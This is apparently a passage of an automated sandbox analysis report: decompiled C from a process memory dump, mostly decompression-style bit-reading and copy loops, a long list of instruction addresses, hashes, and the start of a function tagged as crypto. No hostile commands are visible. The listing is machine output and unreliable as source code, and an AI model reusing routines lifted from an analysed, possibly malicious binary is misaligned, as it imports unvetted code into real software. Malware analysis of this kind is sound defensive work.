															L82:
															E00C4EA80(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x10));
														_t598 =  *(_t658 + 0x18);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E00C47D76(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E00C3A4ED(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x30) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00C417A5(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E00C447DA(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}









































































































































                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c458a1
                                            0x00c458a1
                                            0x00c458a7
                                            0x00c458b2
                                            0x00000000
                                            0x00c458b4
                                            0x00c458b4
                                            0x00c458b4
                                            0x00c458ba
                                            0x00c458ba
                                            0x00c458c3
                                            0x00c458c6
                                            0x00000000
                                            0x00000000
                                            0x00c458d5
                                            0x00c458dc
                                            0x00c45e87
                                            0x00c45e89
                                            0x00c45e8e
                                            0x00c45e95
                                            0x00c45e95
                                            0x00c458e2
                                            0x00c458e2
                                            0x00c458e3
                                            0x00c458e6
                                            0x00c458ed
                                            0x00000000
                                            0x00000000
                                            0x00c458f3
                                            0x00c458fb
                                            0x00c458fc
                                            0x00c458fd
                                            0x00c458fe
                                            0x00c45905
                                            0x00000000
                                            0x00c45907
                                            0x00000000
                                            0x00c45907
                                            0x00c45905
                                            0x00c4590c
                                            0x00c4590e
                                            0x00c45913
                                            0x00c45915
                                            0x00000000
                                            0x00c4591b
                                            0x00c4591b
                                            0x00c4591b
                                            0x00c4591e
                                            0x00c4591e
                                            0x00c4592e
                                            0x00c45933
                                            0x00c45973
                                            0x00c45975
                                            0x00c4597c
                                            0x00c45982
                                            0x00c45988
                                            0x00c4598f
                                            0x00c459bb
                                            0x00c459bd
                                            0x00c459be
                                            0x00c459bf
                                            0x00c459c1
                                            0x00c459da
                                            0x00c459dd
                                            0x00c459e4
                                            0x00c459e7
                                            0x00c459ea
                                            0x00c459f6
                                            0x00c45a02
                                            0x00c45a04
                                            0x00c45a0a
                                            0x00c45a0c
                                            0x00c45a0c
                                            0x00c45a0e
                                            0x00000000
                                            0x00c459c3
                                            0x00c459c6
                                            0x00c459c9
                                            0x00c459c9
                                            0x00c459c9
                                            0x00c459cb
                                            0x00c459d8
                                            0x00c459d8
                                            0x00c459d8
                                            0x00c459cd
                                            0x00c459cd
                                            0x00c459ce
                                            0x00c459d1
                                            0x00c459d4
                                            0x00000000
                                            0x00c459d6
                                            0x00000000
                                            0x00c459d6
                                            0x00c459d4
                                            0x00000000
                                            0x00c459c9
                                            0x00c45991
                                            0x00c45993
                                            0x00c45996
                                            0x00c459a0
                                            0x00c459a8
                                            0x00c459ae
                                            0x00c459b1
                                            0x00c45a16
                                            0x00c45a16
                                            0x00c45a1c
                                            0x00c45a58
                                            0x00c45a58
                                            0x00c45a5e
                                            0x00c45e5a
                                            0x00c45e5a
                                            0x00c45e60
                                            0x00c45e98
                                            0x00c45e98
                                            0x00c45e9e
                                            0x00c4603b
                                            0x00c4603b
                                            0x00c4603b
                                            0x00c46044
                                            0x00c46047
                                            0x00c46049
                                            0x00c4604d
                                            0x00c4605c
                                            0x00c4605e
                                            0x00c46061
                                            0x00c46068
                                            0x00c4606e
                                            0x00c46074
                                            0x00c4607b
                                            0x00c460a7
                                            0x00c460a9
                                            0x00c460aa
                                            0x00c460ab
                                            0x00c460ad
                                            0x00c460c9
                                            0x00c460cc
                                            0x00c460d3
                                            0x00c460d6
                                            0x00c460d9
                                            0x00c460e5
                                            0x00c460f1
                                            0x00c460f3
                                            0x00c460f9
                                            0x00c460fb
                                            0x00c460fb
                                            0x00c460fd
                                            0x00c46105
                                            0x00c46105
                                            0x00c46108
                                            0x00c4610b
                                            0x00c4611c
                                            0x00c4611f
                                            0x00c4611f
                                            0x00c4610d
                                            0x00c4610d
                                            0x00c4610d
                                            0x00c46121
                                            0x00c46124
                                            0x00c46126
                                            0x00c4612a
                                            0x00c46131
                                            0x00c46139
                                            0x00c4613b
                                            0x00c46142
                                            0x00c46145
                                            0x00c46145
                                            0x00c46148
                                            0x00c46148
                                            0x00c4614b
                                            0x00c46152
                                            0x00c46156
                                            0x00c46159
                                            0x00c4616b
                                            0x00c4616b
                                            0x00c46176
                                            0x00c46178
                                            0x00c4617d
                                            0x00c4617f
                                            0x00c46224
                                            0x00c46224
                                            0x00c46226
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00000000
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4622c
                                            0x00c4622c
                                            0x00c46232
                                            0x00c46232
                                            0x00c46238
                                            0x00c4623d
                                            0x00c46241
                                            0x00c46244
                                            0x00c46249
                                            0x00c46252
                                            0x00c46254
                                            0x00c46254
                                            0x00c46254
                                            0x00000000
                                            0x00c46232
                                            0x00c46185
                                            0x00c46185
                                            0x00c46187
                                            0x00000000
                                            0x00000000
                                            0x00c4618d
                                            0x00c4618d
                                            0x00c46193
                                            0x00c46195
                                            0x00c4619b
                                            0x00c4619e
                                            0x00c461a0
                                            0x00c461f1
                                            0x00c461f1
                                            0x00c461f4
                                            0x00000000
                                            0x00000000
                                            0x00c461fa
                                            0x00c461fc
                                            0x00c461fc
                                            0x00c461ff
                                            0x00c46203
                                            0x00c46205
                                            0x00c46205
                                            0x00c46209
                                            0x00c4620e
                                            0x00c46211
                                            0x00c46214
                                            0x00c46217
                                            0x00c4621a
                                            0x00c4621a
                                            0x00c4621a
                                            0x00000000
                                            0x00c4621f
                                            0x00c461a2
                                            0x00c461a4
                                            0x00c461a5
                                            0x00c461a7
                                            0x00000000
                                            0x00000000
                                            0x00c461ad
                                            0x00c461af
                                            0x00c461af
                                            0x00c461b2
                                            0x00c461b2
                                            0x00c461b4
                                            0x00c461b6
                                            0x00c461bc
                                            0x00c461c2
                                            0x00c461c8
                                            0x00c461ce
                                            0x00c461d4
                                            0x00c461da
                                            0x00c461dd
                                            0x00c461e0
                                            0x00c461e2
                                            0x00c461e5
                                            0x00c461e7
                                            0x00c461e7
                                            0x00c461e7
                                            0x00000000
                                            0x00c4615b
                                            0x00c4615b
                                            0x00c4615b
                                            0x00c46164
                                            0x00c46165
                                            0x00c45cb9
                                            0x00c45cb9
                                            0x00c45cc0
                                            0x00c45cc5
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c458a1
                                            0x00c458a1
                                            0x00c458a1
                                            0x00c458a7
                                            0x00c458b2
                                            0x00000000
                                            0x00c458b4
                                            0x00c458b4
                                            0x00c458b4
                                            0x00000000
                                            0x00c458b2
                                            0x00000000
                                            0x00c458a1
                                            0x00c45eb2
                                            0x00c45eb9
                                            0x00c45ecd
                                            0x00c45ecd
                                            0x00c45ed8
                                            0x00c45edb
                                            0x00c45ee0
                                            0x00c45ee2
                                            0x00c45ee4
                                            0x00c46001
                                            0x00c46001
                                            0x00c46003
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c458a1
                                            0x00c458a7
                                            0x00c458b2
                                            0x00000000
                                            0x00c458b4
                                            0x00c458b4
                                            0x00c458b4
                                            0x00c458b2
                                            0x00c4589e
                                            0x00c46009
                                            0x00c46009
                                            0x00c4600f
                                            0x00c4600f
                                            0x00c46015
                                            0x00c4601a
                                            0x00c4601e
                                            0x00c46021
                                            0x00c46026
                                            0x00c4602f
                                            0x00c46031
                                            0x00c46031
                                            0x00c46031
                                            0x00c46259
                                            0x00c46259
                                            0x00000000
                                            0x00c46259
                                            0x00c45eea
                                            0x00c45eea
                                            0x00c45eec
                                            0x00000000
                                            0x00000000
                                            0x00c45ef2
                                            0x00c45ef2
                                            0x00c45ef8
                                            0x00c45efa
                                            0x00c45f00
                                            0x00c45f03
                                            0x00c45f05
                                            0x00c45f4f
                                            0x00c45f4f
                                            0x00c45f52
                                            0x00c45f7d
                                            0x00c45f7d
                                            0x00c45f80
                                            0x00c45f82
                                            0x00000000
                                            0x00000000
                                            0x00c45f88
                                            0x00c45f8a
                                            0x00c45f8d
                                            0x00c45f90
                                            0x00c45f93
                                            0x00000000
                                            0x00000000
                                            0x00c45f99
                                            0x00c45f9c
                                            0x00c45f9f
                                            0x00c45fa2
                                            0x00c45fa5
                                            0x00000000
                                            0x00000000
                                            0x00c45fab
                                            0x00c45fae
                                            0x00c45fb1
                                            0x00c45fb4
                                            0x00c45fb7
                                            0x00000000
                                            0x00000000
                                            0x00c45fbd
                                            0x00c45fc0
                                            0x00c45fc3
                                            0x00c45fc6
                                            0x00c45fc9
                                            0x00000000
                                            0x00000000
                                            0x00c45fcf
                                            0x00c45fd2
                                            0x00c45fd5
                                            0x00c45fd8
                                            0x00c45fdb
                                            0x00000000
                                            0x00000000
                                            0x00c45fe1
                                            0x00c45fe4
                                            0x00c45fe7
                                            0x00c45fea
                                            0x00c45fed
                                            0x00000000
                                            0x00000000
                                            0x00c45ff3
                                            0x00c45ff6
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c4589e
                                            0x00000000
                                            0x00c4589e
                                            0x00c4589e
                                            0x00c45f54
                                            0x00c45f56
                                            0x00c45f56
                                            0x00c45f59
                                            0x00c45f5d
                                            0x00c45f5f
                                            0x00c45f5f
                                            0x00c45f63
                                            0x00c45f68
                                            0x00c45f6b
                                            0x00c45f6e
                                            0x00c45f71
                                            0x00c45f74
                                            0x00c45f74
                                            0x00c45f74
                                            0x00c45f79
                                            0x00c45f79
                                            0x00000000
                                            0x00c45f79
                                            0x00c45f07
                                            0x00c45f09
                                            0x00c45f0a
                                            0x00c45f0c
                                            0x00000000
                                            0x00000000
                                            0x00c45f0e
                                            0x00c45f10
                                            0x00c45f10
                                            0x00c45f13
                                            0x00c45f13
                                            0x00c45f15
                                            0x00c45f17
                                            0x00c45f1d
                                            0x00c45f23
                                            0x00c45f29
                                            0x00c45f2f
                                            0x00c45f35
                                            0x00c45f3b
                                            0x00c45f3e
                                            0x00c45f41
                                            0x00c45f43
                                            0x00c45f46
                                            0x00c45f48
                                            0x00c45f48
                                            0x00c45f48
                                            0x00000000
                                            0x00c45f4d
                                            0x00c45ebb
                                            0x00c45ebb
                                            0x00c45ec4
                                            0x00c45ec5
                                            0x00000000
                                            0x00c45ec5
                                            0x00c45e73
                                            0x00c45e7a
                                            0x00c45e7f
                                            0x00c45e7f
                                            0x00000000
                                            0x00c4589e
                                            0x00c46159
                                            0x00c460af
                                            0x00c460b5
                                            0x00c460b8
                                            0x00c460b8
                                            0x00c460b8
                                            0x00c460ba
                                            0x00000000
                                            0x00000000
                                            0x00c460bc
                                            0x00c460bc
                                            0x00c460bd
                                            0x00c460c0
                                            0x00c460c3
                                            0x00000000
                                            0x00000000
                                            0x00c460c5
                                            0x00000000
                                            0x00c460c5
                                            0x00c460c7
                                            0x00c460c7
                                            0x00000000
                                            0x00c460c7
                                            0x00c4607d
                                            0x00c4607f
                                            0x00c46082
                                            0x00c4608c
                                            0x00c46094
                                            0x00c4609a
                                            0x00c4609d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4604f
                                            0x00c4604f
                                            0x00c46052
                                            0x00c46054
                                            0x00c46057
                                            0x00c46057
                                            0x00c46057
                                            0x00000000
                                            0x00c4604f
                                            0x00c45ea4
                                            0x00c45ea4
                                            0x00c45ea7
                                            0x00c45eaa
                                            0x00c45eaa
                                            0x00c45e62
                                            0x00c45e68
                                            0x00c45e6a
                                            0x00c45e6f
                                            0x00c45e71
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c45e71
                                            0x00c45a64
                                            0x00c45a64
                                            0x00c45a6a
                                            0x00c45a6d
                                            0x00c45a7e
                                            0x00c45a81
                                            0x00c45a81
                                            0x00c45a6f
                                            0x00c45a6f
                                            0x00c45a6f
                                            0x00c45a83
                                            0x00c45a86
                                            0x00c45a88
                                            0x00c45a8c
                                            0x00c45a93
                                            0x00c45a9b
                                            0x00c45a9d
                                            0x00c45aa4
                                            0x00c45aa7
                                            0x00c45aa7
                                            0x00c45aaa
                                            0x00c45aaa
                                            0x00c45aaf
                                            0x00c45ab6
                                            0x00c45abc
                                            0x00c45ac2
                                            0x00c45ac9
                                            0x00c45af5
                                            0x00c45af7
                                            0x00c45af8
                                            0x00c45af9
                                            0x00c45afb
                                            0x00c45b17
                                            0x00c45b1a
                                            0x00c45b21
                                            0x00c45b24
                                            0x00c45b27
                                            0x00c45b33
                                            0x00c45b3f
                                            0x00c45b41
                                            0x00c45b47
                                            0x00c45b49
                                            0x00c45b49
                                            0x00c45b4b
                                            0x00000000
                                            0x00c45b4b
                                            0x00c45afd
                                            0x00c45b03
                                            0x00c45b06
                                            0x00c45b06
                                            0x00c45b06
                                            0x00c45b08
                                            0x00000000
                                            0x00000000
                                            0x00c45b0a
                                            0x00c45b0a
                                            0x00c45b0b
                                            0x00c45b0e
                                            0x00c45b11
                                            0x00000000
                                            0x00000000
                                            0x00c45b13
                                            0x00000000
                                            0x00c45b13
                                            0x00c45b15
                                            0x00c45b15
                                            0x00000000
                                            0x00c45acb
                                            0x00c45acb
                                            0x00c45acd
                                            0x00c45ad0
                                            0x00c45ada
                                            0x00c45ae2
                                            0x00c45ae8
                                            0x00c45aeb
                                            0x00c45b53
                                            0x00c45b53
                                            0x00c45b56
                                            0x00c45b59
                                            0x00c45b69
                                            0x00c45b6c
                                            0x00c45b6c
                                            0x00c45b5b
                                            0x00c45b5b
                                            0x00c45b5b
                                            0x00c45b6e
                                            0x00c45b6f
                                            0x00c45b73
                                            0x00c45b75
                                            0x00c45b79
                                            0x00c45b7b
                                            0x00c45c6f
                                            0x00c45c6f
                                            0x00000000
                                            0x00c45b81
                                            0x00c45b81
                                            0x00c45b81
                                            0x00c45b84
                                            0x00c45cca
                                            0x00c45ccd
                                            0x00c45cd6
                                            0x00c45cde
                                            0x00c45ce2
                                            0x00c45ce6
                                            0x00c45ced
                                            0x00c45cf0
                                            0x00c45cf6
                                            0x00c45c72
                                            0x00c45c72
                                            0x00c45c78
                                            0x00c45c7a
                                            0x00c45c7b
                                            0x00c45c81
                                            0x00c45c83
                                            0x00c45c84
                                            0x00c45c8a
                                            0x00c45c8c
                                            0x00c45c8c
                                            0x00c45c8c
                                            0x00c45c8a
                                            0x00c45c81
                                            0x00c45c90
                                            0x00c45c96
                                            0x00c45c9c
                                            0x00c45c9f
                                            0x00c45ca2
                                            0x00c45ca9
                                            0x00c45cac
                                            0x00c45cfe
                                            0x00c45d04
                                            0x00c45d07
                                            0x00c45d09
                                            0x00c45d10
                                            0x00c45d12
                                            0x00c45d14
                                            0x00c45e20
                                            0x00c45e20
                                            0x00c45e22
                                            0x00000000
                                            0x00000000
                                            0x00c45e28
                                            0x00c45e28
                                            0x00c45e2e
                                            0x00c45e2e
                                            0x00c45e34
                                            0x00c45e39
                                            0x00c45e3d
                                            0x00c45e40
                                            0x00c45e45
                                            0x00c45e4e
                                            0x00c45e50
                                            0x00c45e50
                                            0x00c45e50
                                            0x00000000
                                            0x00c45e55
                                            0x00c45d1a
                                            0x00c45d1a
                                            0x00c45d1c
                                            0x00000000
                                            0x00000000
                                            0x00c45d22
                                            0x00c45d22
                                            0x00c45d28
                                            0x00c45d2b
                                            0x00c45d31
                                            0x00c45d33
                                            0x00c45d37
                                            0x00c45d82
                                            0x00c45d82
                                            0x00c45d85
                                            0x00c45db4
                                            0x00c45db4
                                            0x00c45db6
                                            0x00c45dbe
                                            0x00c45dc1
                                            0x00c45dc4
                                            0x00c45dcd
                                            0x00c45dd0
                                            0x00c45dd3
                                            0x00c45ddc
                                            0x00c45ddf
                                            0x00c45de2
                                            0x00c45deb
                                            0x00c45dee
                                            0x00c45df1
                                            0x00c45dfa
                                            0x00c45dfd
                                            0x00c45e00
                                            0x00c45e09
                                            0x00c45e0c
                                            0x00c45e0f
                                            0x00c45e18
                                            0x00c45e18
                                            0x00c45e0f
                                            0x00c45e00
                                            0x00c45df1
                                            0x00c45de2
                                            0x00c45dd3
                                            0x00c45dc4
                                            0x00000000
                                            0x00c45db6
                                            0x00c45d87
                                            0x00c45d89
                                            0x00c45d89
                                            0x00c45d8c
                                            0x00c45d90
                                            0x00c45d92
                                            0x00c45d92
                                            0x00c45d96
                                            0x00c45d9b
                                            0x00c45d9e
                                            0x00c45da1
                                            0x00c45da4
                                            0x00c45da7
                                            0x00c45da7
                                            0x00c45da7
                                            0x00c45dac
                                            0x00c45db0
                                            0x00000000
                                            0x00c45db0
                                            0x00c45d39
                                            0x00c45d39
                                            0x00c45d3c
                                            0x00000000
                                            0x00000000
                                            0x00c45d3e
                                            0x00c45d40
                                            0x00c45d40
                                            0x00c45d43
                                            0x00c45d43
                                            0x00c45d45
                                            0x00c45d48
                                            0x00c45d4e
                                            0x00c45d54
                                            0x00c45d5a
                                            0x00c45d60
                                            0x00c45d66
                                            0x00c45d6c
                                            0x00c45d6f
                                            0x00c45d72
                                            0x00c45d75
                                            0x00c45d78
                                            0x00c45d7b
                                            0x00c45d7b
                                            0x00c45d7b
                                            0x00000000
                                            0x00c45cae
                                            0x00c45cae
                                            0x00c45cae
                                            0x00c45cb7
                                            0x00c45cb8
                                            0x00000000
                                            0x00c45cb8
                                            0x00c45cac
                                            0x00c45b8a
                                            0x00c45b8a
                                            0x00c45bbd
                                            0x00c45b8c
                                            0x00c45b8f
                                            0x00c45b98
                                            0x00c45ba0
                                            0x00c45ba3
                                            0x00c45bab
                                            0x00c45bb2
                                            0x00c45bb8
                                            0x00c45bb8
                                            0x00c45bc2
                                            0x00c45bc9
                                            0x00c45bcf
                                            0x00c45bd5
                                            0x00c45bdc
                                            0x00c45c08
                                            0x00c45c0a
                                            0x00c45c0b
                                            0x00c45c0c
                                            0x00c45c0e
                                            0x00c45c2a
                                            0x00c45c2d
                                            0x00c45c34
                                            0x00c45c37
                                            0x00c45c3a
                                            0x00c45c46
                                            0x00c45c52
                                            0x00c45c54
                                            0x00c45c5a
                                            0x00c45c5c
                                            0x00c45c5c
                                            0x00c45c5e
                                            0x00000000
                                            0x00c45c5e
                                            0x00c45c10
                                            0x00c45c16
                                            0x00c45c19
                                            0x00c45c19
                                            0x00c45c19
                                            0x00c45c1b
                                            0x00000000
                                            0x00000000
                                            0x00c45c1d
                                            0x00c45c1d
                                            0x00c45c1e
                                            0x00c45c21
                                            0x00c45c24
                                            0x00000000
                                            0x00000000
                                            0x00c45c26
                                            0x00000000
                                            0x00c45c26
                                            0x00c45c28
                                            0x00c45c28
                                            0x00000000
                                            0x00c45bde
                                            0x00c45bde
                                            0x00c45be0
                                            0x00c45be3
                                            0x00c45bed
                                            0x00c45bf5
                                            0x00c45bfb
                                            0x00c45bfe
                                            0x00c45c66
                                            0x00c45c69
                                            0x00c45c69
                                            0x00c45c6b
                                            0x00000000
                                            0x00c45c6b
                                            0x00c45bdc
                                            0x00c45b7b
                                            0x00c45ac9
                                            0x00c45a1e
                                            0x00c45a1e
                                            0x00c45a25
                                            0x00c45a43
                                            0x00c45a49
                                            0x00c45a4e
                                            0x00c45a51
                                            0x00000000
                                            0x00c45a51
                                            0x00c45a27
                                            0x00c45a34
                                            0x00c45a3c
                                            0x00000000
                                            0x00c45a3c
                                            0x00c4598f
                                            0x00c45935
                                            0x00c45935
                                            0x00c45937
                                            0x00000000
                                            0x00000000
                                            0x00c45939
                                            0x00c4593b
                                            0x00c45940
                                            0x00c45946
                                            0x00c4594c
                                            0x00000000
                                            0x00000000
                                            0x00c45952
                                            0x00c45952
                                            0x00c45966
                                            0x00c45966
                                            0x00c4596d
                                            0x00c46261
                                            0x00c46261
                                            0x00000000
                                            0x00c46261
                                            0x00000000
                                            0x00c4596d
                                            0x00c45954
                                            0x00c45954
                                            0x00c4595a
                                            0x00c45960
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c45960
                                            0x00c458a1

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                                            • Instruction ID: b41d650e67fc1fe0161803a5898c2c0f431222cf4437d283c9518c35885eeaf5
                                            • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                                            • Instruction Fuzzy Hash: 53621771604B859FCB29CF78C8906B9BBE1BF95304F08856ED8AA8B347D730EA45D711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C46CDB, Relevance: .8, Instructions: 773COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00C46CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
